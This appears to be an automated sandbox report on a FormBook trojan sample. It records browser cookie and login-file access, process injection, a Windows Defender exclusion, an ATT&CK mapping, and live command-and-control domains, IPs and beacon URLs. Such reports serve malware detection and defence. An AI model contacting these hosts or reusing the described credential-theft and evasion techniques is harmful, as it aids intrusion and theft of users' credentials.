                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match, File source: 5.2.SW_48912.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SW_48912.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.3539365806.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2041411490.00000000018E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.3539428414.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\sdchange.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\sdchange.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 5.2.SW_48912.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.SW_48912.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.3539365806.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2041411490.00000000018E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000009.00000002.3539428414.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (the report's grid, rebuilt here one tactic per line, columns read in row order; the numbers preceding a technique are the grid's count badges, kept as shown)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: 412 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 113 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1580361. Sample: SW_48912.scr.exe. Start date: 24/12/2024. Architecture: WINDOWS. Score: 100.

                [Behavior graph rendered as an image; the node and edge text recoverable from it follows.]

                Contacted from the start node: www.letsbookcruise.xyz (Performs DNS queries to domains with low reputation); www.sorket.tech; 12 other IPs or domains.
                Signatures on the sample: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 5 other signatures.

                Process tree:
                • SW_48912.scr.exe (started). Dropped file: C:\Users\user\...\SW_48912.scr.exe.log, ASCII. Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes.
                  • SW_48912.scr.exe (started). Signatures: Maps a DLL or memory area into another process.
                    • kygSlzwdnMXWUy.exe (injected). Signatures: Found direct / indirect Syscall (likely to bypass EDR).
                      • sdchange.exe (started). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures.
                        • kygSlzwdnMXWUy.exe (injected). Network: techstarllc.cloud 45.41.206.57, ports 49761, 49766, 49775, WEB2OBJECTSUS Reserved; www.cruycq.info 47.83.1.90, ports 49950, 49959, 49965, VODANETInternationalIP-BackboneofVodafoneDE United States; 5 other IPs or domains. Signatures: Found direct / indirect Syscall (likely to bypass EDR).
                        • firefox.exe (started).
                  • powershell.exe (started). Signatures: Loading BitLocker PowerShell Module.
                    • WmiPrvSE.exe (started).
                    • conhost.exe (started).

                Source | Detection | Scanner | Label | Link
                SW_48912.scr.exe | 42% | ReversingLabs | Win32.Trojan.Swotter |
                SW_48912.scr.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.1337street.shop/0gdu/?APatc2S=ftdEXwexurZghboTWCQIfexBY+9Yz0emmuPXGo7z5YH1NvMxMc1Z+hNvSZgcJAE/0+TeoQEUDOn3ji72SzidAcXn1q/xR22GeFlELvD1wSK+h6ylcF5G1Wk=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.sorket.tech/4emb/?APatc2S=4UULdis/QLNauySAEekUDYGsEUzq6e4B9T06+64m5ppnN51KKUcjYDTfNmInUMaV4Nrjr2QNBcJEKgo4MRK3zTGcylMwgMm1Um/ECC9y2F4s+sXg4aJXZlc=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.bgezakofe.shop/xyk7/?APatc2S=7w6h3yg5DzwdgNI65S7VcS/c5VHhBop0WwRkNseC06Sr52JwcWk0c6DqTwIm1K9fQyswYfQJG9wFl64D0T3JITTmdOuXWIhwMsN5rklNN+kNuHqELEqoQwI=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.letsbookcruise.xyz0%Avira URL Cloudsafe
                http://www.dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFlesQuWhFQQZZidkqYdB7fb353dPYMbluACcdqBxcZ3O1YRYJaqin39JmHPU=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.sorket.tech/4emb/0%Avira URL Cloudsafe
                http://www.techstarllc.cloud/phws/0%Avira URL Cloudsafe
                http://www.cruycq.info/lf6y/0%Avira URL Cloudsafe
                http://www.hokasportshoes.shop/vupi/?APatc2S=Tq4/OmBpIxnnwNjJag9TFYyv8dvb/Sss2ypRVdq0cF+rzvKYwtC+P6jcfpXxbnkAS7eQgKkM8sOtTzDV8Gz3yNosqQRn5vos9Tvg5+UIPuaa+2ZkNRQX8Ww=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.hokasportshoes.shop/vupi/0%Avira URL Cloudsafe
                http://www.techstarllc.cloud/phws/?APatc2S=ocd4ZrzPXg6l4sWdfUN2xABm4ThkzzNaoz23ovA+FAa05WbJK6tPDbHnnDy/N4II5dY3pVgUKOhDHtvifryE7bJ5Z4nnWPOvcZ1hqHENcBbD3aMp/XsQNfk=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.dejikenkyu.cyou/pmpa/0%Avira URL Cloudsafe
                http://www.primetream.live/8t9s/0%Avira URL Cloudsafe
                http://www.primetream.live/8t9s/?APatc2S=cQOSSB92WrTaqBxCYQmY0/8zd7KVOpZ6t2v2QQp7ftKEyFsbpuIbzJ+m0CFldn0ugFGiUddTcSTZ3FmKLOS+RDlSRV2taFz1Xj7dqojcNfOZnPX4GO36V4Y=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                https://dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFle0%Avira URL Cloudsafe
                http://www.letsbookcruise.xyz/uwne/0%Avira URL Cloudsafe
                http://www.cruycq.info/lf6y/?APatc2S=WhdxLvX8GJneo6U33XtFYdZadP1zCD74gCKWMK8L+5irjEYccqFO+hPhPBcWoDythyZIL285KG4ZhivHPukP3bI3GzR3QcEebrpG7Eo0u0Vi5UP/PYQWYzw=&3FNHL=wVCtFrFXof0%Avira URL Cloudsafe
                http://www.1337street.shop/0gdu/0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.primetream.live
                162.0.236.169
                truetrue
                  unknown
                  94950.bodis.com
                  199.59.243.227
                  truefalse
                    high
                    www.sorket.tech
                    199.59.243.227
                    truetrue
                      unknown
                      www.bgezakofe.shop
                      104.21.10.26
                      truetrue
                        unknown
                        techstarllc.cloud
                        45.41.206.57
                        truetrue
                          unknown
                          www.dejikenkyu.cyou
                          104.21.80.1
                          truetrue
                            unknown
                            natroredirect.natrocdn.com
                            85.159.66.93
                            truefalse
                              high
                              www.cruycq.info
                              47.83.1.90
                              truetrue
                                unknown
                                www.stoauto.pro
                                194.58.112.174
                                truefalse
                                  unknown
                                  www.techstarllc.cloud
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.1337street.shop
                                    unknown
                                    unknownfalse
                                      unknown
                                      www.hokasportshoes.shop
                                      unknown
                                      unknownfalse
                                        unknown
                                        www.letsbookcruise.xyz
                                        unknown
                                        unknowntrue
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.bgezakofe.shop/xyk7/?APatc2S=7w6h3yg5DzwdgNI65S7VcS/c5VHhBop0WwRkNseC06Sr52JwcWk0c6DqTwIm1K9fQyswYfQJG9wFl64D0T3JITTmdOuXWIhwMsN5rklNN+kNuHqELEqoQwI=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.1337street.shop/0gdu/?APatc2S=ftdEXwexurZghboTWCQIfexBY+9Yz0emmuPXGo7z5YH1NvMxMc1Z+hNvSZgcJAE/0+TeoQEUDOn3ji72SzidAcXn1q/xR22GeFlELvD1wSK+h6ylcF5G1Wk=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.cruycq.info/lf6y/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFlesQuWhFQQZZidkqYdB7fb353dPYMbluACcdqBxcZ3O1YRYJaqin39JmHPU=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sorket.tech/4emb/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.hokasportshoes.shop/vupi/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sorket.tech/4emb/?APatc2S=4UULdis/QLNauySAEekUDYGsEUzq6e4B9T06+64m5ppnN51KKUcjYDTfNmInUMaV4Nrjr2QNBcJEKgo4MRK3zTGcylMwgMm1Um/ECC9y2F4s+sXg4aJXZlc=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.techstarllc.cloud/phws/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.hokasportshoes.shop/vupi/?APatc2S=Tq4/OmBpIxnnwNjJag9TFYyv8dvb/Sss2ypRVdq0cF+rzvKYwtC+P6jcfpXxbnkAS7eQgKkM8sOtTzDV8Gz3yNosqQRn5vos9Tvg5+UIPuaa+2ZkNRQX8Ww=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.techstarllc.cloud/phws/?APatc2S=ocd4ZrzPXg6l4sWdfUN2xABm4ThkzzNaoz23ovA+FAa05WbJK6tPDbHnnDy/N4II5dY3pVgUKOhDHtvifryE7bJ5Z4nnWPOvcZ1hqHENcBbD3aMp/XsQNfk=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.cruycq.info/lf6y/?APatc2S=WhdxLvX8GJneo6U33XtFYdZadP1zCD74gCKWMK8L+5irjEYccqFO+hPhPBcWoDythyZIL285KG4ZhivHPukP3bI3GzR3QcEebrpG7Eo0u0Vi5UP/PYQWYzw=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.primetream.live/8t9s/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.dejikenkyu.cyou/pmpa/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.primetream.live/8t9s/?APatc2S=cQOSSB92WrTaqBxCYQmY0/8zd7KVOpZ6t2v2QQp7ftKEyFsbpuIbzJ+m0CFldn0ugFGiUddTcSTZ3FmKLOS+RDlSRV2taFz1Xj7dqojcNfOZnPX4GO36V4Y=&3FNHL=wVCtFrFXoftrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.letsbookcruise.xyz/uwne/true
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.1337street.shop/0gdu/true
                                          • Avira URL Cloud: safe
                                          unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sajatypeworks.com | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.typography.netD | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com | sdchange.exe, 0000000A.00000002.3541338963.0000000007570000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.000000000584E000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.0000000005398000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.00000000056BC000.00000004.10000000.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003BCE000.00000004.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003A3C000.00000004.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003718000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/staff/dennis.htm | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.galapagosdesign.com/DPlease | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.urwpp.deDPlease | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.zhongyicts.com.cn | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SW_48912.scr.exe, 00000000.00000002.1920984218.0000000002570000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp, SW_48912.scr.exe, 00000000.00000002.1929676185.0000000004F74000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.letsbookcruise.xyz | kygSlzwdnMXWUy.exe, 0000000B.00000002.3540931534.000000000549D000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFle | sdchange.exe, 0000000A.00000002.3539997755.0000000005B72000.00000004.10000000.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003EF2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | sdchange.exe, 0000000A.00000002.3539997755.0000000004C8C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539460184.0000000004403000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107696949.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2330034201.000000003BF4C000.00000004.80000000.00040000.00000000.sdmp, SW_48912.scr.exe | false | | high
http://www.carterandcone.coml | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/frere-user.html | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers8 | SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmp | false | | high
[IP map legend: No. of IPs < 25% / 25% < No. of IPs < 50% / 50% < No. of IPs < 75% / 75% < No. of IPs]
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.10.26 | www.bgezakofe.shop | United States | 13335 | CLOUDFLARENETUS | true
45.41.206.57 | techstarllc.cloud | Reserved | 22400 | WEB2OBJECTSUS | true
47.83.1.90 | www.cruycq.info | United States | 3209 | VODANETInternationalIP-BackboneofVodafoneDE | true
199.59.243.227 | 94950.bodis.com | United States | 395082 | BODIS-NJUS | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
162.0.236.169 | www.primetream.live | Canada | 22612 | NAMECHEAP-NETUS | true
104.21.80.1 | www.dejikenkyu.cyou | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580361
Start date and time: 2024-12-24 11:34:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SW_48912.scr.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/7@11/7
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 150
• Number of non-executed functions: 283
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.175.87.197, 13.107.246.63, 20.12.23.50
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
